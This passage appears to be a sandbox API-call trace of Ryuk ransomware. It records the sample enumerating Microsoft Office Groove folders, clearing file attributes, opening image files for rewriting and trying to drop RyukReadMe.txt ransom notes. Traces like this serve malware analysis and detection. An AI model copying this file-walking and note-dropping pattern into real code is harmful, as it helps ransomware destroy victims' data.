dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.890] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.890] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.890] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.890] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.890] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.891] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.891] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.891] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.891] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.892] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.892] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.892] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.892] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.893] SetLastError (dwErrCode=0x0) [0136.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.896] GetLastError () returned 0x5 [0136.896] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.896] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.896] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.896] SetLastError (dwErrCode=0x0) [0136.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.896] GetLastError () returned 0x5 [0136.896] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.896] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.896] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.896] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.896] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.896] SetLastError (dwErrCode=0x0) [0136.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.896] GetLastError () returned 0x5 [0136.896] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.896] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.896] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0136.898] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.898] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.898] SetLastError (dwErrCode=0x0) [0136.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.898] GetLastError () returned 0x5 [0136.898] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.898] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.898] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.900] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.900] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.900] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.900] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendartooliconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.900] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.900] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.900] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.900] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendartooliconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.901] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.901] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.902] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.902] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.902] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarViewButtonImages.jpg", dwFileAttributes=0x80) returned 0 [0136.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarViewButtonImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendarviewbuttonimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.902] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.902] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.902] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.902] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.902] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImage.jpg", dwFileAttributes=0x80) returned 0 [0136.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\globebuttonimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.903] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.903] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.903] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.903] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.903] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImageMask.bmp", dwFileAttributes=0x80) returned 0 [0136.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\globebuttonimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.904] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.904] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.904] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.904] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.905] SetLastError (dwErrCode=0x0) [0136.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.908] GetLastError () returned 0x5 [0136.908] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.908] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.908] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.908] SetLastError (dwErrCode=0x0) [0136.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.908] GetLastError () returned 0x5 [0136.908] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.908] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.908] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.910] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.910] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.910] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.911] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Auto.jpg", dwFileAttributes=0x80) returned 0 [0136.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Auto.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_auto.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.911] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.911] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.911] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.912] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_AutoMask.bmp", dwFileAttributes=0x80) returned 0 [0136.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_AutoMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_automask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.912] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.912] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.912] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.912] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHigh.jpg", dwFileAttributes=0x80) returned 0 [0136.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHigh.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_contacthigh.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.913] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.913] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.913] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.913] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.913] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHighMask.bmp", dwFileAttributes=0x80) returned 0 [0136.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHighMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_contacthighmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.913] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.913] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.913] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.913] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.914] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLow.jpg", dwFileAttributes=0x80) returned 0 [0136.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_contactlow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.914] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.914] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.914] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.914] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.914] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLowMask.bmp", dwFileAttributes=0x80) returned 0 [0136.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLowMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_contactlowmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.915] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.915] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.915] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.915] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHigh.jpg", dwFileAttributes=0x80) returned 0 [0136.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHigh.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_filehigh.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.916] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.916] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.916] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.916] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.917] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHighMask.bmp", dwFileAttributes=0x80) returned 0 [0136.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHighMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_filehighmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.917] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.917] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.917] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.917] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.917] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOff.jpg", dwFileAttributes=0x80) returned 0 [0136.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOff.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_fileoff.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.917] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.917] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.918] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.918] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.918] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOffMask.bmp", dwFileAttributes=0x80) returned 0 [0136.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOffMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_fileoffmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.918] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.918] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.918] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.918] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.918] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_High.jpg", dwFileAttributes=0x80) returned 0 [0136.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_High.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_high.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.919] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.919] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.919] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.919] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.919] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_HighMask.bmp", dwFileAttributes=0x80) returned 0 [0136.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_HighMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_highmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.919] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.919] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.919] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.919] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.920] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Medium.jpg", dwFileAttributes=0x80) returned 0 [0136.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Medium.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_medium.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.920] CloseHandle 